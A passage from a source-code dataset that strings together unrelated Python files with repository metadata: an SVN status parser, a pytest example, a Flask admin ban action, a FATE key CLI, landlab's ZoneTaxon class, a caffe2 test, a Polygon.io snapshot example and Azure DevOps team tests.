rootstatus.unknown.append(wcpath)
elif c0 == 'X':
wcpath = rootwcpath.__class__(
rootwcpath.localpath.join(fn, abs=1),
auth=rootwcpath.auth)
rootstatus.external.append(wcpath)
elif c0 == 'I':
wcpath = rootwcpath.join(fn, abs=1)
rootstatus.ignored.append(wcpath)
continue
#elif c0 in '~!' or c4 == 'S':
# raise NotImplementedError("received flag %r" % c0)
m = WCStatus._rex_status.match(rest)
if not m:
if c7 == '*':
fn = rest.strip()
wcpath = rootwcpath.join(fn, abs=1)
rootstatus.update_available.append(wcpath)
continue
if line.lower().find('against revision:')!=-1:
update_rev = int(rest.split(':')[1].strip())
continue
if line.lower().find('status on external') > -1:
# XXX not sure what to do here... perhaps we want to
# store some state instead of just continuing, as right
# now it makes the top-level external get added twice
# (once as external, once as 'normal' unchanged item)
# because of the way SVN presents external items
continue
# keep trying
raise ValueError("could not parse line %r" % line)
else:
rev, modrev, author, fn = m.groups()
wcpath = rootwcpath.join(fn, abs=1)
#assert wcpath.check()
if c0 == 'M':
assert wcpath.check(file=1), "didn't expect a directory with changed content here"
rootstatus.modified.append(wcpath)
elif c0 == 'A' or c3 == '+' :
rootstatus.added.append(wcpath)
elif c0 == 'D':
rootstatus.deleted.append(wcpath)
elif c0 == 'C':
rootstatus.conflict.append(wcpath)
elif c0 == '~':
rootstatus.kindmismatch.append(wcpath)
elif c0 == '!':
rootstatus.incomplete.append(wcpath)
elif c0 == 'R':
rootstatus.replaced.append(wcpath)
elif not c0.strip():
rootstatus.unchanged.append(wcpath)
else:
raise NotImplementedError("received flag %r" % c0)
if c1 == 'M':
rootstatus.prop_modified.append(wcpath)
# XXX do we cover all client versions here?
if c2 == 'L' or c5 == 'K':
rootstatus.locked.append(wcpath)
if c7 == '*':
rootstatus.update_available.append(wcpath)
if wcpath == rootwcpath:
rootstatus.rev = rev
rootstatus.modrev = modrev
rootstatus.author = author
if update_rev:
rootstatus.update_rev = update_rev
continue
return rootstatus
fromstring = staticmethod(fromstring)
class XMLWCStatus(WCStatus):
def fromstring(data, rootwcpath, rev=None, modrev=None, author=None):
""" parse 'data' (XML string as outputted by svn st) into a status obj
"""
# XXX for externals, the path is shown twice: once
# with external information, and once with full info as if
# the item was a normal non-external... the current way of
# dealing with this issue is by ignoring it - this does make
# externals appear as external items as well as 'normal',
# unchanged ones in the status object so this is far from ideal
rootstatus = WCStatus(rootwcpath, rev, modrev, author)
update_rev = None
minidom, ExpatError = importxml()
try:
doc = minidom.parseString(data)
except ExpatError:
e = sys.exc_info()[1]
raise ValueError(str(e))
urevels = doc.getElementsByTagName('against')
if urevels:
rootstatus.update_rev = urevels[-1].getAttribute('revision')
for entryel in doc.getElementsByTagName('entry'):
path = entryel.getAttribute('path')
statusel = entryel.getElementsByTagName('wc-status')[0]
itemstatus = statusel.getAttribute('item')
if itemstatus == 'unversioned':
wcpath = rootwcpath.join(path, abs=1)
rootstatus.unknown.append(wcpath)
continue
elif itemstatus == 'external':
wcpath = rootwcpath.__class__(
rootwcpath.localpath.join(path, abs=1),
auth=rootwcpath.auth)
rootstatus.external.append(wcpath)
continue
elif itemstatus == 'ignored':
wcpath = rootwcpath.join(path, abs=1)
rootstatus.ignored.append(wcpath)
continue
elif itemstatus == 'incomplete':
wcpath = rootwcpath.join(path, abs=1)
rootstatus.incomplete.append(wcpath)
continue
rev = statusel.getAttribute('revision')
if itemstatus == 'added' or itemstatus == 'none':
rev = '0'
modrev = '?'
author = '?'
date = ''
elif itemstatus == "replaced":
pass
else:
#print entryel.toxml()
commitel = entryel.getElementsByTagName('commit')[0]
if commitel:
modrev = commitel.getAttribute('revision')
author = ''
author_els = commitel.getElementsByTagName('author')
if author_els:
for c in author_els[0].childNodes:
author += c.nodeValue
date = ''
for c in commitel.getElementsByTagName('date')[0]\
.childNodes:
date += c.nodeValue
wcpath = rootwcpath.join(path, abs=1)
assert itemstatus != 'modified' or wcpath.check(file=1), (
'did\'t expect a directory with changed content here')
itemattrname = {
'normal': 'unchanged',
'unversioned': 'unknown',
'conflicted': 'conflict',
'none': 'added',
}.get(itemstatus, itemstatus)
attr = getattr(rootstatus, itemattrname)
attr.append(wcpath)
propsstatus = statusel.getAttribute('props')
if propsstatus not in ('none', 'normal'):
rootstatus.prop_modified.append(wcpath)
if wcpath == rootwcpath:
rootstatus.rev = rev
rootstatus.modrev = modrev
rootstatus.author = author
rootstatus.date = date
# handle repos-status element (remote info)
rstatusels = entryel.getElementsByTagName('repos-status')
if rstatusels:
rstatusel = rstatusels[0]
ritemstatus = rstatusel.getAttribute('item')
if ritemstatus in ('added', 'modified'):
rootstatus.update_available.append(wcpath)
lockels = entryel.getElementsByTagName('lock')
if len(lockels):
rootstatus.locked.append(wcpath)
return rootstatus
fromstring = staticmethod(fromstring)
class InfoSvnWCCommand:
def __init__(self, output):
# Path: test
# URL: http://codespeak.net/svn/std.path/trunk/dist/std.path/test
# Repository UUID: fd0d7bf2-dfb6-0310-8d31-b7ecfe96aada
# Revision: 2151
# Node Kind: directory
# Schedule: normal
# Last Changed Author: hpk
# Last Changed Rev: 2100
# Last Changed Date: 2003-10-27 20:43:14 +0100 (Mon, 27 Oct 2003)
# Properties Last Updated: 2003-11-03 14:47:48 +0100 (Mon, 03 Nov 2003)
d = {}
for line in output.split('\n'):
if not line.strip():
continue
key, value = line.split(':', 1)
key = key.lower().replace(' ', '')
value = value.strip()
d[key] = value
try:
self.url = d['url']
except KeyError:
raise ValueError("Not a versioned resource")
#raise ValueError, "Not a versioned resource %r" % path
self.kind = d['nodekind'] == 'directory' and 'dir' or d['nodekind']
try:
self.rev = int(d['revision'])
except KeyError:
self.rev = None
self.path = py.path.local(d['path'])
self.size = self.path.size()
if 'lastchangedrev' in d:
self.created_rev = int(d['lastchangedrev'])
if 'lastchangedauthor' in d:
self.last_author = d['lastchangedauthor']
if 'lastchangeddate' in d:
self.mtime = parse_wcinfotime(d['lastchangeddate'])
self.time = self.mtime * 1000000
def __eq__(self, other):
return self.__dict__ == other.__dict__
def parse_wcinfotime(timestr):
""" Returns seconds since epoch, UTC. """
# example: 2003-10-27 20:43:14 +0100 (Mon, 27 Oct 2003)
m = re.match(r'(\d+-\d+-\d+ \d+:\d+:\d+) ([+-]\d+) .*', timestr)
if not m:
raise ValueError("timestring %r does not match" % timestr)
timestr, timezone = m.groups()
# do not handle timezone specially, return value should be UTC
parsedtime = time.strptime(timestr, "%Y-%m-%d %H:%M:%S")
return calendar.timegm(parsedtime)
def make_recursive_propdict(wcroot,
output,
rex = re.compile("Properties on '(.*)':")):
""" Return a dictionary of path->PropListDict mappings. """
lines = [x for x in output.split('\n') if x]
pdict = {}
while lines:
line = lines.pop(0)
m = rex.match(line)
if not m:
raise ValueError("could not parse propget-line: %r" % line)
path = m.groups()[0]
wcpath = wcroot.join(path, abs=1)
propnames = []
while lines and lines[0].startswith(' '):
propname = lines.pop(0).strip()
propnames.append(propname)
assert propnames, "must have found properties!"
pdict[wcpath] = PropListDict(wcpath, propnames)
return pdict
def importxml(cache=[]):
if cache:
return cache
from xml.dom import minidom
from xml.parsers.expat import ExpatError
cache.extend([minidom, ExpatError])
return cache
class LogEntry:
def __init__(self, logentry):
self.rev = int(logentry.getAttribute('revision'))
for lpart in filter(None, logentry.childNodes):
if lpart.nodeType == lpart.ELEMENT_NODE:
if lpart.nodeName == 'author':
self.author = lpart.firstChild.nodeValue
elif lpart.nodeName == 'msg':
if lpart.firstChild:
self.msg = lpart.firstChild.nodeValue
else:
self.msg = ''
elif lpart.nodeName == 'date':
#2003-07-29T20:05:11.598637Z
timestr = lpart.firstChild.nodeValue
self.date = parse_apr_time(timestr)
elif lpart.nodeName == 'paths':
self.strpaths = []
for ppart in filter(None, lpart.childNodes):
if ppart.nodeType == ppart.ELEMENT_NODE:
self.strpaths.append(PathEntry(ppart))
def __repr__(self):
return '<Logentry rev=%d author=%s date=%s>' % (
self.rev, self.author, self.date)
|
87e5d5124d3a054f02ed28390178d9073e78b104
|
80e7b99f9882fcabce36a97500d0d99937975a38
|
/programming-language/cases/python/examples/py.test/example2_exception.py
|
0ccee31ee67e1c70d343d7f388574b17afa6e882
|
[
"Unlicense"
] |
permissive
|
wdv4758h/notes
|
b1dcb06602a63e7fc94ff1fce817f34dd2be502e
|
986cbd10b79b644c1a22a8a8426f14a016290500
|
refs/heads/master
| 2023-07-23T17:35:55.735741
| 2023-07-08T12:13:38
| 2023-07-08T13:11:17
| 24,794,858
| 148
| 22
| null | 2020-07-05T16:24:09
| 2014-10-04T16:36:12
|
C++
|
UTF-8
|
Python
| false
| false
| 292
|
py
|
example2_exception.py
|
#!/usr/bin/env python
'''
you can use ``py.test -x`` to stop after first failure,
or use ``py.test --maxfail=N`` to stop after N failures.
'''
import pytest
def f():
raise SystemExit(1)
def test_f_fail():
f()
def test_f_pass():
with pytest.raises(SystemExit):
f()
|
8bb295747b199dedead32890c494878d29ed9752
|
378c63f88e266b35aa07f2691de768bd55f12637
|
/actions/demo_ban_user.py
|
cccb6be346783b62e1d9aca42cb8ad33fa5cf51c
|
[
"WTFPL"
] |
permissive
|
vas3k/GodMode2
|
a55ba1a177e48743eb36ae808e1238858a96dab9
|
d8a79b45c6d8b94f3d2af3113428a87d148d20d0
|
refs/heads/public
| 2023-05-12T00:27:34.315970
| 2021-09-08T12:05:52
| 2021-09-08T12:05:52
| 63,632,563
| 291
| 22
|
WTFPL
| 2023-05-01T20:52:43
| 2016-07-18T19:52:52
|
CSS
|
UTF-8
|
Python
| false
| false
| 515
|
py
|
demo_ban_user.py
|
from flask import render_template
from godmode.actions.base import BaseAction
from godmode.acl import ACL
class DemoBanUserAction(BaseAction):
name = "ban"
title = "Ban"
acl = ACL.ADMIN
stay_on_page = True
style = "white-space: nowrap;"
methods = ["GET", "POST"]
def do_item_action(self, *args, **kwargs):
user_id = kwargs.pop("id")
self.model.update(id=user_id, is_locked=True)
return render_template("success.html", message="User {} was banned".format(id))
|
9e77ad9475691445f6400a4aabcc403ba1d81f93
|
572afc77a246acb9483b47fc9e1839f47005d736
|
/python/fate_client/flow_client/flow_cli/commands/key.py
|
fd2f0451667148ffe39b029b27a8a58ff2bac20e
|
[
"Apache-2.0"
] |
permissive
|
FederatedAI/FATE
|
7c787c308cca9ff46f287d24569c68de0a1cac07
|
8767db5ec0cb93784f64b290bc39b7b545c530fb
|
refs/heads/master
| 2023-08-17T10:13:00.302529
| 2023-06-14T07:01:38
| 2023-06-14T07:01:38
| 167,349,656
| 4,942
| 1,571
|
Apache-2.0
| 2023-09-14T07:02:29
| 2019-01-24T10:32:43
|
Python
|
UTF-8
|
Python
| false
| false
| 2,153
|
py
|
key.py
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import click
from flow_client.flow_cli.utils import cli_args
from flow_client.flow_cli.utils.cli_utils import preprocess, access_server
@click.group(short_help="Key Operations")
@click.pass_context
def key(ctx):
"""
\b
Provides numbers of key operational commands, including save, query and delete.
For more details, please check out the help text.
"""
pass
@key.command("save", short_help="Save Public Key Command")
@cli_args.CONF_PATH
@click.pass_context
def save(ctx, **kwargs):
"""
- DESCRIPTION:
\b
save other site public key
\b
- USAGE:
flow key save -c fateflow/examples/key/save_public_key.json
"""
config_data, dsl_data = preprocess(**kwargs)
access_server('post', ctx, 'key/public/save', config_data)
@key.command("delete", short_help="Delete Public Key Command")
@cli_args.PARTYID_REQUIRED
@click.pass_context
def delete(ctx, **kwargs):
"""
- DESCRIPTION:
\b
delete other site public key
\b
- USAGE:
flow key delete -p 10000
"""
config_data, dsl_data = preprocess(**kwargs)
access_server('post', ctx, 'key/public/delete', config_data)
@key.command("query", short_help="Query Public Key Command")
@cli_args.PARTYID_REQUIRED
@click.pass_context
def query(ctx, **kwargs):
"""
- DESCRIPTION:
\b
query site public key
\b
- USAGE:
flow key query -p 10000
"""
config_data, dsl_data = preprocess(**kwargs)
access_server('post', ctx, 'key/query', config_data)
|
7282a56210de13af30da88f9fa357b77798c61dc
|
568a2667a1b6ec33a0dec9ac01844ef74e11ab2b
|
/landlab/components/species_evolution/zone_taxon.py
|
a2207762c861f4ff2cf41a36565ec4ada554505a
|
[
"MIT"
] |
permissive
|
landlab/landlab
|
0bcc9b7b1d8c4d7f79bad687e1526b80ebc83728
|
1cd72e5832ece1aa922cd1b239e2e94ed0f11f8b
|
refs/heads/master
| 2023-08-31T07:24:21.545523
| 2023-08-29T18:51:06
| 2023-08-29T18:51:06
| 19,599,383
| 326
| 313
|
MIT
| 2023-09-14T19:12:23
| 2014-05-09T04:52:50
|
Python
|
UTF-8
|
Python
| false
| false
| 14,012
|
py
|
zone_taxon.py
|
#!/usr/bin/env python
"""ZoneTaxon object of SpeciesEvolver."""
import numpy as np
from pandas import Series
from .base_taxon import Taxon
class ZoneTaxon(Taxon):
"""A taxon based in zones.
A ``ZoneTaxon`` is composed of members of a lower taxonomic level that each
exists within a ``Zone`` object. Taxonomic rank is not considered by this
class despite the use of the term, 'speciation', which is used herein to
generally describe creation of a child taxon object.
All zones of the taxon can be obtained with the attribute, ``zones`` that
are the objects that manage the geographic aspect of taxon member
populations. The total geographic extent of all populations is depicted by
the ``range_mask`` attribute. The zones of a ZoneTaxon instance are created
and updated using a ``ZoneController``. At model time steps, the
connectivity of zones over time is obtained using attributes of the
``Zone`` object.
The evolution of this taxon type is carried out in two stages during a
model time step. In the first stage, the zones of the taxon are updated
as the result of zone connectivity between the prior and current step in
the method, ``_update_zones``. This method is the primary implementation of
taxon dispersal and it is called in a stage prior to other evolutionary
processes so that all taxa are positioned in their landscape locations
prior to the other processes.
In the second stage, processes are carried out in methods that are readily
expanded or overridden when needed. The primary methods of second stage
macroevolution are ``_evaluate_dispersal``, ``_evaluate_speciation``, and
``_evaluate_extinction``. The evaluate dispersal method is intended to
modify dispersal conducted in the first stage and it has no effect unless
it is expanded or overridden to have an effect. Processes other than those
listed above can be called by expanding or overridding the ``_evolve``
method.
The taxon is allopatric when it is associated with/exists within multiple
zones (signifying multiple member populations). A timer is started when a
taxon becomes allopatric. Allopatric speciation occurs once the timer
reaches or exceeds the ``time_to_allopatric_speciation`` initialization
parameter. If the initialization parameter, ``persists_post_speciation``
is True (default), a child taxon is created in each zone except one zone
(the largest by area) that becomes the sole zone of the taxon. If
``persists_post_speciation`` is set to False, a child taxon is created in
each and every zone, and the parent no longer occupies any zones, and
therefore the parent taxon is no longer extant.
Extinction occurs when the taxon is no longer associated with any zones.
This occurs when zones in the prior time step do not overlap zones in the
current time step, signifying the geographic range of the taxon is no more.
A taxon can become no longer extant also when the taxon speciates and
``persists_post_speciation`` is False signifying that the parent taxon
has evolved into multiple taxon distinct from the original taxon.
The following columns will be added to the ``record_data_frame`` of the
SpeciesEvolver instance that tracks objects of this Taxon: 'speciations'
and 'extinctions', which are the counts of these variables at time steps.
Another column, 'pseudoextinctions' will be included when
``persists_post_speciation`` is False. This variable is the count of
occurrences when a parent taxon became non-extant due to speciation and not
because of an absence of zones.
"""
def __init__(
self,
zones,
parent=None,
time_to_allopatric_speciation=0,
persists_post_speciation=True,
):
"""Initialize a taxon.
Parameters
----------
zones : list of Zones
The initial SpeciesEvolver Zones where the taxon is located.
parent : Taxon, optional
A SpeciesEvolver taxon that is the parent taxon. The default value,
'None' indicates no parent.
time_to_allopatric_speciation : float, int, optional
The delay in model time to speciate following taxon geographic
fragmentation, indicated by multiple objects in the attribute,
``zones``. Speciation occurs at the time step when the delay is
reached or exceeded. The default value of 0 indicates speciation
occurs at the same time step as geographic fragmentation.
persists_post_speciation : boolean, optional
When 'True', the default, taxon persists despite speciation. When
'False' and following speciation, the taxon is no longer extant.
"""
super().__init__()
self.parent = parent
self._tas = time_to_allopatric_speciation
self._pps = persists_post_speciation
# Store zones that each represent an instance of a narrower taxonomic
# level, e.g. a population.
self._zones = zones
# Set taxon time in allopatry.
self._time_in_allopatry = None
self._update_allopatry_state()
@Taxon.extant.setter
def extant(self, state):
"""Set the living state of the taxon."""
self._extant = state
if not state:
# Ensure the taxon is not associated with zones when it is no
# longer extant.
self._zones = []
@property
def range_mask(self):
"""A mask representing the geographic extent of the taxon.
The mask is an array with a length of grid number of nodes. The taxon
exists at nodes where mask elements are ``True``. The mask of a
ZoneTaxon object is the union of all of its zone masks.
"""
masks = [zone.mask for zone in self.zones]
mask = np.any(masks, 0)
return mask
@property
def zones(self):
"""The zones of the taxon."""
return self._zones
def _evolve(self, dt, stage, record):
"""Run a step of evolutionary processes.
Dispersal resolved during stage 1 can be modified by extending or
overriding the dispersal evaluation method, as can speciation and
extinction that are also evaluated in this stage.
The attribute, ``extant`` is updated by this method.
Parameters
----------
dt : float
The model time step duration.
stage : int
The evolution stage of the time step.
record : defaultdict
The SpeciesEvolver record.
Returns
-------
boolean
Indicates if the taxon is still evolving. When `False` is returned,
this method will not be called for the taxon in subsequent stages in
the current model time step.
list of Taxon
The children produced by the taxon at a given stage. The ``evolve``
method of child taxon will be called in stages following the stage
the child taxon was produced. An empty list indicates no child
taxon.
"""
if stage == 0:
self._update_zones()
child_taxa = []
elif stage == 1:
# Evaluate macroevolutionary processes now that zones of all taxon
# objects were updated in stage 1.
self._evaluate_dispersal(dt)
self._update_allopatry_state(dt)
child_taxa = self._evaluate_speciation(dt)
child_count = len(child_taxa)
extinct = self._evaluate_extinction(dt)
pseudoextinct = child_count > 1 and not self._pps
self.extant = not extinct and not pseudoextinct
# Update the record.
record.increment_value("speciations", child_count)
record.increment_value("extinctions", int(extinct and not pseudoextinct))
if not self._pps:
record.increment_value("pseudoextinctions", int(pseudoextinct))
return stage < 1, child_taxa
def _update_zones(self):
"""Update the zones of the taxon.
Dispersal is represented by setting taxon zones to the zones of the
current time step that overlap the taxon zones of the prior time step
(`successors of a zone`).
"""
successors = []
for zone in self._zones:
successors.extend(zone.successors)
self._zones = Series(successors).drop_duplicates().tolist()
def _update_allopatry_state(self, dt=None):
"""Update taxon time in allopatry.
Parameter, ``dt`` can optionally be set to increment time in allopatry
given that the taxon is already allopatric.
Parameters
----------
dt : float, int, optional
The model time step duration.
"""
if len(self.zones) < 2:
self._time_in_allopatry = None
elif self._time_in_allopatry is None:
self._time_in_allopatry = 0
elif dt is not None:
self._time_in_allopatry += dt
def _produce_child_taxon(self, zones):
"""Get the taxon resulting from speciation.
This method returns a taxon of the same type as the object that
speciates. This child taxon is initialized with the initialization
parameter values of the parent object. At minimum in derived
implementations of this method, the parent taxon of the child should be
set to `self` to correctly construct the lineage.
Parameters
----------
zones : list of Zones
The zones where the child taxon will exist.
Returns
-------
Taxon
The child taxon.
"""
taxon_type = type(self)
child_taxon = taxon_type(
zones,
parent=self,
time_to_allopatric_speciation=self._tas,
persists_post_speciation=self._pps,
)
return child_taxon
def _evaluate_allopatric_speciation(self, dt):
"""Return child taxa if the taxon is allopatric.
A child taxon is returned for each zone except the largest zone if
``persists_post_speciation`` is True. A child taxon is returned for all
zones if ``persists_post_speciation`` is False. The ``zones`` attribute
is set to a list containing the largest zone or no zone when
``persists_post_speciation`` is True or False, respectively. This
method is called by the ``_evaluate_speciation`` method in the second
stage of taxon evolution.
Parameter ``dt`` is not used in the ZoneTaxon implementation of this
method. It is included to follow the pattern of including this
parameter in ZoneTaxon evolution methods.
Parameters
----------
dt : float, int
The model time step duration.
Returns
-------
list of taxon objects
The taxon objects produced by allopatric speciation. An empty list
indicates no child objects and no allopatric speciation.
"""
zones = self.zones
allopatric = self._time_in_allopatry is not None
children = []
if allopatric and self._time_in_allopatry >= self._tas:
if self._pps:
# The zone/member with the greatest zone area remains
# associated with the object.
idx = np.argmax([zone.area for zone in zones])
largest_zone = zones.pop(idx)
for zone in zones:
child = self._produce_child_taxon([zone])
children.append(child)
if self._pps:
self._zones = [largest_zone]
else:
self._zones = []
self._update_allopatry_state()
return children
def _evaluate_dispersal(self, dt):
"""Modify taxon dispersal.
Population dispersal is principally determined in stage 1 by the
method, ``_update_zones``. This evaluation method is called by the
taxon evolve method in stage 2 and allows modification of the stage 1
dispersal. This method implemented in ZoneTaxon does not modify stage 1
dispersal. It is intended to be overridden when needed.
Parameters
----------
dt : float, int
The model time step duration.
"""
# pragma: no cover
def _evaluate_speciation(self, dt):
"""Return child taxa if speciation occurs.
This method is called by the taxon stage 2 evolve method. The default
implementation of this method solely gets any taxon objects resulting
from the method, ``_evaluate_allopatric_speciation``. Other modes of
speciation, including sympatric, can be evaluated here by expanded this
``_evaluate_speciation`` method.
Parameters
----------
dt : float, int
The model time step duration.
Returns
-------
list of taxon objects
The taxon objects produced by allopatric speciation. An empty list
indicates no child objects and no allopatric speciation.
"""
child_taxa = self._evaluate_allopatric_speciation(dt)
return child_taxa
def _evaluate_extinction(self, dt):
"""Determine if extinction occurs.
Extinction occurs if no zone/member populations exist. Other conditions
of extinction can be included by expanding or overridding this method.
Parameters
----------
dt : float, int
The model time step duration.
Returns
-------
boolean
`True` indicates the taxon has become extinct. `False` indicates
the taxon persists.
"""
taxon_occupies_no_zones = len(self.zones) == 0
return taxon_occupies_no_zones
|
2f0b5486b196d8fcccc64bf6a5c9f71f429674c9
|
fbbe424559f64e9a94116a07eaaa555a01b0a7bb
|
/pytorch/source/caffe2/python/operator_test/flatten_op_test.py
|
19d204e0bdededf4bd30b0551b1a32e1d6e28d26
|
[
"MIT"
] |
permissive
|
ryfeus/lambda-packs
|
6544adb4dec19b8e71d75c24d8ed789b785b0369
|
cabf6e4f1970dc14302f87414f170de19944bac2
|
refs/heads/master
| 2022-12-07T16:18:52.475504
| 2022-11-29T13:35:35
| 2022-11-29T13:35:35
| 71,386,735
| 1,283
| 263
|
MIT
| 2022-11-26T05:02:14
| 2016-10-19T18:22:39
|
Python
|
UTF-8
|
Python
| false
| false
| 1,067
|
py
|
flatten_op_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from hypothesis import given
import numpy as np
from caffe2.python import core
import caffe2.python.hypothesis_test_util as hu
class TestFlatten(hu.HypothesisTestCase):
@given(X=hu.tensor(min_dim=2, max_dim=4),
**hu.gcs)
def test_flatten(self, X, gc, dc):
for axis in range(X.ndim + 1):
op = core.CreateOperator(
"Flatten",
["X"],
["Y"],
axis=axis)
def flatten_ref(X):
shape = X.shape
outer = np.prod(shape[:axis]).astype(int)
inner = np.prod(shape[axis:]).astype(int)
return np.copy(X).reshape(outer, inner),
self.assertReferenceChecks(gc, op, [X], flatten_ref)
# Check over multiple devices
self.assertDeviceChecks(dc, op, [X], [0])
if __name__ == "__main__":
import unittest
unittest.main()
|
d12164bd8dbcd9e0f274654ceb6348921120f0ed
|
9dd2bc9409bcdd7749cf0bad79092cd204200eb5
|
/examples/rest/universal-snapshot.py
|
1ab5e80482589fcd4f7a33d6d8d0229fdfe45634
|
[
"MIT"
] |
permissive
|
polygon-io/client-python
|
b36ccdd380fdf4b9ec344c3e9d43eaab0ce313cc
|
195d3a2894b979c4ad86c6bd170b674e09c30d9d
|
refs/heads/master
| 2023-08-29T12:04:36.823546
| 2023-08-28T16:19:25
| 2023-08-28T16:19:25
| 216,660,192
| 574
| 189
|
MIT
| 2023-09-11T19:50:33
| 2019-10-21T20:33:17
|
Python
|
UTF-8
|
Python
| false
| false
| 1,323
|
py
|
universal-snapshot.py
|
from typing import cast, Iterator, Union
from urllib3 import HTTPResponse
from polygon import RESTClient
from polygon.rest.models import UniversalSnapshot, SnapshotMarketType
# docs
# https://polygon.io/docs/stocks/get_v3_snapshot
# https://polygon-api-client.readthedocs.io/en/latest/Snapshot.html
# client = RESTClient("XXXXXX") # hardcoded api_key is used
client = RESTClient() # POLYGON_API_KEY environment variable is used
def print_snapshots(iterator: Union[Iterator[UniversalSnapshot], HTTPResponse]):
snapshots = [s for s in iterator]
print(f"count: {len(snapshots)}")
for item in snapshots:
print(item)
# it = client.list_universal_snapshots() # all tickers for all assets types in lexicographical order
it = client.list_universal_snapshots(
ticker_any_of=[
"AAPL",
"O:AAPL230519C00055000",
"DOES_NOT_EXIST",
"X:1INCHUSD",
"C:AEDAUD",
]
)
print_snapshots(it)
it = client.list_universal_snapshots(type="stocks", ticker_gt="A", ticker_lt="AAPL")
print_snapshots(it)
it = client.list_universal_snapshots(type="stocks", ticker_gte="AAPL", ticker_lte="ABB")
print_snapshots(it)
it = client.list_universal_snapshots(
type="options",
ticker_gte="O:AAPL230804C00050000",
ticker_lte="O:AAPL230804C00070000",
)
print_snapshots(it)
|
72e5c6208bea2ec38a32b877e317f6d2337078bc
|
98810fbf90a42028915a88bfac9fb8cb8681008e
|
/azure-devops/azext_devops/test/team/test_team.py
|
3c332d6bb2fcd2adeb1c1a3fb43b7508b27b9bcb
|
[
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-unicode",
"LGPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"PSF-2.0",
"PostgreSQL",
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.1-only",
"CC-BY-4.0",
"Python-2.0",
"MPL-1.1",
"OpenSSL",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"MPL-1.0",
"ISC",
"GPL-2.0-only",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"GPL-1.0-or-later",
"MPL-2.0"
] |
permissive
|
Azure/azure-devops-cli-extension
|
ba87357a8243e1318f100791fc32acbb59448d05
|
bd34a6fd0658a15dadf6c09c7f6217ca5ffa662b
|
refs/heads/master
| 2023-08-29T10:56:54.228674
| 2023-07-17T04:37:06
| 2023-07-17T04:37:06
| 107,708,057
| 419
| 208
|
MIT
| 2023-08-02T02:10:10
| 2017-10-20T17:39:11
|
Python
|
UTF-8
|
Python
| false
| false
| 7,141
|
py
|
test_team.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
try:
# Attempt to load mock (works on Python 3.3 and above)
from unittest.mock import patch
except ImportError:
# Attempt to load mock (works on Python version below 3.3)
from mock import patch
from azext_devops.devops_sdk.v5_0.core.core_client import CoreClient
from azext_devops.dev.team.team import (create_team,
delete_team,
get_team,
get_teams,
get_team_members,
update_team)
from azext_devops.dev.common.services import clear_connection_cache
from azext_devops.test.utils.authentication import AuthenticatedTests
class TestTeamMethods(AuthenticatedTests):
_TEST_DEVOPS_ORGANIZATION = 'https://someorganization.visualstudio.com'
_TEST_PROJECT_NAME = 'sample_project'
_TEST_TEAM_NAME = 'sample_team'
_TEST_TEAM_DESCRIPTION = 'sample_team_description'
_TOP_VALUE = 10
_SKIP_VALUE = 2
def setUp(self):
self.authentication_setup()
self.get_client = patch('azext_devops.devops_sdk.connection.Connection.get_client')
self.create_team_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.create_team')
self.delete_team_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.delete_team')
self.get_team_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.get_team')
self.get_teams_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.get_teams')
self.get_team_members_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.get_team_members_with_extended_properties')
self.update_team_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.update_team')
#start the patcher
self.mock_get_client = self.get_client.start()
self.mock_create_team = self.create_team_patcher.start()
self.mock_delete_team = self.delete_team_patcher.start()
self.mock_get_team = self.get_team_patcher.start()
self.mock_get_teams = self.get_teams_patcher.start()
self.mock_get_team_members = self.get_team_members_patcher.start()
self.mock_update_team = self.update_team_patcher.start()
#set return values
self.mock_get_client.return_value = CoreClient(base_url=self._TEST_DEVOPS_ORGANIZATION)
#clear connection cache before running each test
clear_connection_cache()
def tearDown(self):
patch.stopall()
def test_create_team(self):
create_team(self._TEST_TEAM_NAME, self._TEST_TEAM_DESCRIPTION, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_create_team.assert_called_once()
create_team_param = self.mock_create_team.call_args_list[0][1]
self.assertEqual(self._TEST_PROJECT_NAME, create_team_param['project_id'], str(create_team_param))
self.assertEqual(self._TEST_TEAM_NAME, create_team_param['team'].name, str(create_team_param))
self.assertEqual(self._TEST_TEAM_DESCRIPTION, create_team_param['team'].description, str(create_team_param))
def test_delete_team(self):
delete_team(self._TEST_TEAM_NAME, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_delete_team.assert_called_once()
delete_team_param = self.mock_delete_team.call_args_list[0][1]
self.assertEqual(self._TEST_PROJECT_NAME, delete_team_param['project_id'], str(delete_team_param))
self.assertEqual(self._TEST_TEAM_NAME, delete_team_param['team_id'], str(delete_team_param))
def test_get_team(self):
get_team(self._TEST_TEAM_NAME, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_get_team.assert_called_once()
get_team_param = self.mock_get_team.call_args_list[0][1]
self.assertEqual(self._TEST_PROJECT_NAME, get_team_param['project_id'], str(get_team_param))
self.assertEqual(self._TEST_TEAM_NAME, get_team_param['team_id'], str(get_team_param))
def test_get_teams(self):
